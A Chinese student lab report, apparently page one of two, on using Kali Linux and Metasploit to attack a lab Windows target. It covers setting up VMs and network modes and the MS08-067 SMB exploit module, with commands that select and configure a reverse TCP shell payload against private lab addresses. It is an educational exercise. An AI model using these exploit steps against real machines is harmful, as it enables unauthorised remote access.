kali下metasploit的漏洞攻击实践

发表于:2018-11-15 13:24

字体: | 上一篇 | 下一篇 | 我要投稿

 作者:20179204葛鸽    来源:博客园

  一、实验内容
  1.使用kali进行靶机的漏洞扫描,利用metasploit选择其中的一个漏洞进行攻击,并获取权限。
  2.分析攻击的原理以及获取了什么样的权限。
  二、实验要求
  1.熟悉kali原理和使用方法。
  2.认真操作,详细记录实验过程和实验结果。
  三、实验工具
  笔记本电脑一台,安装parallels desktop虚拟机,安装kali和靶机系统windows10。另外安装了vmware虚拟机,安装kali和靶机系统windows2000。
  四、实验步骤
  (一)pd虚拟机下搭建渗透测试环境
  1.在pd虚拟机下安装kali攻击机系统以及windows10靶机系统。
    
  Kali是一个linux系统,Kali Linux预装了许多渗透测试软件,包括nmap (端口扫描器)、Wireshark (数据包分析器)、John the Ripper (密码破解器),以及Aircrack-ng (一应用于对无线局域网进行渗透测试的软件).用户可通过硬盘、live CD或live USB运行Kali Linux。Metasploit的Metasploit Framework支持Kali Linux,Metasploit一套针对远程主机进行开发和执行Exploit代码的工具。
    
  2.在parallels desktop中设置两台虚拟机网络为共享网络模式(若是vmware虚拟机则是nat模式),自动分配IP地址,之后两台虚拟机就可以直接ping通。
  (1)靶机ip地址获取:在cmd中输入ipconfig,获取ip地址为10.211.55.3。
    
  (2)攻击机ip地址获取:在shell中输入ifconfig,获取ip地址为10.211.55.4。
     
  (3)可见,两台虚拟机处于同一网段下,可以互相ping通。
     
   
  一般来说在unix或linux系统中会一直ping下去,这时按快捷键Ctrl+Z或Ctrl+C均可停止ping。
  (4)补充说明“vmware下虚拟机的三种网络模式”
  a.桥接。桥接网络是指本地物理网卡和虚拟网卡通过VMnet0虚拟交换机进行桥接,物理网卡和虚拟网卡在拓扑图上处于同等地位,那么物理网卡和虚拟网卡就相当于处于同一个网段,虚拟交换机就相当于一台现实网络中的交换机,所以两个网卡的IP地址也要设置为同一网段。
  b.NAT。NAT模式中,就是让虚拟机借助NAT(网络地址转换)功能,通过宿主机器所在的网络来访问公网。NAT模式中,虚拟机的网卡和物理网卡的网络,不在同一个网络,虚拟机的网卡是在vmware提供的一个虚拟网络。
  NAT和桥接的比较: NAT模式和桥接模式虚拟机都可以上外网;由于NAT的网络在vmware提供的一个虚拟网络里,所以局域网其他主机是无法访问虚拟机的,而宿主机可以访问虚拟机,虚拟机可以访问局域网的所有主机,因为真实的局域网相对于NAT的虚拟网络,就是NAT的虚拟网络的外网,不懂的人可以查查NAT的相关知识;桥接模式下,多个虚拟机之间可以互相访问;NAT模式下,多个虚拟机之间也可以相互访问。
  c.Host-Only。在Host-Only模式下,虚拟网络是一个全封闭的网络,它唯一能够访问的就是主机。其实Host-Only网络和NAT网络很相似,不同的地方就是Host-Only网络没有NAT服务,所以虚拟网络不能连接到Internet。主机和虚拟机之间的通信是通过VMware Network Adepter VMnet1虚拟网卡来实现的。
  (二)vmware下搭建渗透测试环境
  在按步骤进行攻击操作后(详细步骤见第三部分),发现作为靶机的win10系统无漏洞可攻击,于是改用老师所给的靶机系统进行试验,在vmware虚拟机下操作。
  1.vmware下安装kali
  这里注意其中一步操作“将GRUB安装至硬盘-将GRUB启动引导器安装到主引导记录吗?-是”后,“安装启动引导器的设备”不能空着,可填写dev-sda,否则可能出现安装linux后黑屏只出现光标的现象。
  2.设置网络模式
  设置虚拟机下的kali和windows靶机系统为nat模式。其中设置靶机ip地址为192.168.87.131,攻击机ip地址为192.168.87.129,且互相都可以ping通。
    
  
   
   (三)MS08_067远程漏洞攻击实践
  1.在kali终端中开启msfconsole。
    

  2.输入命令search ms08_067,会显示出找到的渗透模块,如下图所示:
    
  3.输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。
    
  4.输入命令show payloads会显示出有效的攻击载荷,比如shell_reverse_tcp。
    
  5.命令show targets会显示出可以被攻击的靶机的操作系统型号,如下图所示:
    
  6.使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。
    
  7.输入命令show options显示我们需要在攻击前需要设置的数据。
    
  8.输入命令set LHOST "kali Ip",即set LHOST 192.168.87.129;set RHOST "Win Ip",即set RHOST 192.168.87.131。
    

上文内容不用于商业目的,如涉及知识产权问题,请权利人联系博为峰小编(021-64471599-8017),我们将立即处理。
21/212>
《2023软件测试行业现状调查报告》独家发布~

关注51Testing

联系我们

快捷面板 站点地图 联系我们 广告服务 关于我们 站长统计 发展历程

法律顾问:上海兰迪律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2024
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪ICP备05003035号

沪公网安备 31010102002173号